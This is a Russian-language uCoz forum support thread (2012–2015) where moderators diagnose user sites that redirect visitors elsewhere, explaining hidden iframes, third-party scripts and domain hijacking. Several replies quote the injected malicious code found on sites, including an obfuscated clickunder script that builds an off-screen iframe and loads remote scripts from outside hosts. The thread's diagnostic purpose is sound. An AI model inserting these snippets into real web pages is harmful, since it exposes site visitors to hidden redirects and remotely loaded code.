Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16 02 Фев 2012
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 631 | 22:40:14 22 Янв 2015
Annutta, проблема не будет разрешена до тех пор пока вы не удалите это
Код

<!-- RoboText (contextual advertising) START -->
<script type="text/javascript">
robotext_partner = 231106;
robotext_showfoto = 1;
robotext_adcount = 2;
robotext_blocktype = 0;
robotext_foncolor = 'FFFFFF';
robotext_subjcolor = '0000FF';
robotext_textcolor = '333333';
robotext_linkcolor = '009900';
robotext_compact = 'yes';
document.write('<sc'+'ript type="text/javascript" src="http://js.robotext.info/context.js"></sc'+'ript>');
</script>
<!-- RoboText (contextual advertising) END -->
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
vipcolea
Сообщений: 1
Репутация: 0

Сообщение # 632 | 00:02:17 01 Фев 2015
намогите мне пожалуста иногда когда я захожу на какой то сайт меня кидает на minecraft.su что мне надо делать

Добавлено (01 Фев 2015, 00:02:17)
---------------------------------------------
я хочу зайты на www.steamcraft.net а меня кидает на www.minecraft.su

shankypoker
Сообщений: 1
Репутация: 0

Сообщение # 633 | 14:34:04 15 Фев 2015
помогите пожалуйста.
захожу на свой сат http://shankybot.ucoz.ru/ и меня перекидывает на http://piccash.net/4861/119487/
проблема при входе под логином и гостем
фыва
Сообщений: 2
Репутация: 0

Сообщение # 634 | 12:24:22 17 Фев 2015
webanet, помогите, пожалуйста, разобраться. Захожу на c свой сайт http://school1ku.narod.ru/ И тут же он перенаправляет меня на какой-то посторонний ресурс. Что делать?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 635 | 18:35:19 18 Фев 2015
фыва, в первую очередь удалите виджет калькулятора. он генерит скрипт, который и перекидывает вас
Цитата
document.write('<div id="ababbabbbbabababbbbbababababbababbba"></div><script>function ababbabbbbabababbbbbababababbababbba1(){ababbabbbbabababbbbbababababbababbba2 = document.createElement("if"+"rame");ababbabbbbabababbbbbababababbababbba2.setAttribute("src","//2.sbnetwork.ru/uri."+"php?i=16986");ababbabbbbabababbbbbababababbababbba2.style.width = "2px";ababbabbbbabababbbbbababababbababbba2.style.height = "2px";ababbabbbbabababbbbbababababbababbba2.style.position="absolute";ababbabbbbabababbbbbababababbababbba2.style.left="-10000px";ababbabbbbabababbbbbababababbababbba2.id="ababbabbbbabababbbbbababababbababbba5";ababbabbbbabababbbbbababababbababbba6 = document.getElementById("ababbabbbbabababbbbbababababbababbba");ababbabbbbabababbbbbababababbababbba6.appendChild(ababbabbbbabababbbbbababababbababbba2);}function ababbabbbbabababbbbbababababbababbba7(){ababbabbbbabababbbbbababababbababbba3 = document.getElementById("ababbabbbbabababbbbbababababbababbba5");ababbabbbbabababbbbbababababbababbba3.parentNode.removeChild(ababbabbbbabababbbbbababababbababbba3);}function ababbabbbbabababbbbbababababbababbba4(){ababbabbbbabababbbbbababababbababbba1();setTimeout(ababbabbbbabababbbbbababababbababbba7,50000);}setTimeout(ababbabbbbabababbbbbababababbababbba4,100);</script><script>(function(w) {var script = document.createElement("script");var wwerw = setInterval(function() {if (typeof w.document.body !== "undefined") {script.src = "//1.harkerlabs.org/?613511=87rz9aHl6-jk7O7j9Lq-vrQ";w.document.body.appendChild(script);clearInterval(wwerw);}}, 300);})(window); </script><script>function widget1422807547000200200000205_DoFSCommand(c, a) {if (c == "poweron") { window.widget1422807547000200200000205=1;var s = document.createElement("script");s.src = a;s.setAttribute("async","true");document.getElementsByTagName("head")[0].appendChild(s);} if (c == "poweroff") { window.widget1422807547000200200000205=0;}}</script><script language="VBScript">Sub widget1422807547000200200000205_FSCommand(ByVal c, ByVal a) call widget1422807547000200200000205_DoFSCommand(c, a) end sub</script><script src="http://widgetsmonster.com/swfobject.js"></script><div id="widgetblock"></div><script>var params = { allowScriptAccess: "always", wmode:"transparent" };var atts = { id: "widget1422807547000200200000205",name: "widget1422807547000200200000205" };var flashvars = { fid:"1422807547000200200000205"};swfobject.embedSWF("http://widgetsmonster.com/w/84cc5554d8830e1bbe17ff002f8098c81422807547-000200200000205/wid.swf", "widgetblock", "144", "228", "9.0.0", null, flashvars, params, atts);</script>');

выделила красным рабочую часть вашего виджета, отвечающую за переброс. то есть это не переброс. это кликандер

далее удалите виджет ай-пи адреса. данная контора тоже вшивает рекламу в свои творения. воздержитесь на будущее от установки "бесаплатных" виджетов, найденных в сети. как правило они все содержат ту или иную агрессивную рекламу
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
zaytsev6864
Сообщений: 1
Репутация: 0

Сообщение # 636 | 14:26:04 19 Фев 2015
Здравствуйте, вы только помогаете сайтам на Ucoz?
если такая же проблема но только на wordpress
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 637 | 14:53:11 19 Фев 2015
zaytsev6864, только по сайтам uCoz
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Djenya
Сообщений: 11
Репутация: 0

Сообщение # 638 | 00:32:37 24 Фев 2015
Всем привет. Возникла проблема с сайтом http://muzzzona.ru. На сайте стоит редирект и редирект на посторонние ресурсы. Подскажите как избавится от вируса, а то не могу найти его.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 639 | 00:39:26 24 Фев 2015
Djenya, начните с удаления скрипта
Код
<script type="text/javascript" charset="windows-1251" src="http://media-code.info/codes/12928/11468_muzzzona.ru.js"></script>

можно через быструю замену
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
гвоздика
Сообщений: 1
Репутация: 0

Сообщение # 640 | 14:51:47 25 Мар 2015
Добрый день! У нас с сайтом www.gvozdikalen31.ucoz.ru. Возникли проблемы. При входе перебрасывает на другой сайт http://dl01.hot2zonezcc.name/girlsprison/ . Заходила через веб-топ в ПУ проверяла глобальные блоки, но ничего не нашла! Чистила кеш, куки перезагружала, создавала новый пароль - все тщетно! Помогите разобраться в чем дело! Пожалуйста!!!
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 641 | 20:12:55 25 Мар 2015
гвоздика, удалите код из материала, на главной странице
Код
<script>(function () {
  var script = document.createElement('script');
  script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random();
  script.onload = script.onerror = function () {
  script.onload = script.onerror = null;
  script.parentNode.removeChild(script);
  }

  document.body.appendChild(script);
  })();</script>


Управление материалами осуществляется через сайт.
IIIyJIMyC
Сообщений: 1
Репутация: 0

Сообщение # 642 | 13:30:11 28 Мар 2015
сайт не относится к системе uCoz
Сообщение отредактировал webanet - Суббота, 28 Мар 2015, 17:44:13
TeacherMorozova
Сообщений: 4
Репутация: 0

Сообщение # 643 | 09:03:51 05 Апр 2015
Здравствуйте, у нас образовательный сайт http://sholsdora.ucoz.ru/. К сожалению, в последнее время переходя по внутренним ссылкам сайта - всплывает окно игрового сайта https://luxorslots-casino.com/. Пожалуйста, помогите понять, в чем проблема?
TeacherMorozova
Сообщений: 4
Репутация: 0

Сообщение # 644 | 09:37:18 05 Апр 2015
_VITALIK_, Хорошо, я постараюсь по инструкции сделать. А может дело в этих двух виджетах. Они висят у нас второй год-жалко удалять - вписываются в дизайн.
Прикрепления: 6226289.png (400.0 Kb)
_VITALIK_
Сообщений: 696
Репутация: 115
Уровень замечаний:

Сообщение # 645 | 09:39:57 05 Апр 2015
Цитата TeacherMorozova ()
_VITALIK_, Хорошо, я постараюсь по инструкции сделать. А может дело в этих двух виджетах. Они висят у нас второй год-жалко удалять - вписываются в дизайн.

TeacherMorozova, Ну попробуйте их удалить. Я их бы не ставил вообще. Это скрипты сторонего ресурса , не есть хорошо. Но браузер всё равно почистите
Сообщение отредактировал _VITALIK_ - Воскресенье, 05 Апр 2015, 09:41:26
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
Поиск:
Telegram
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!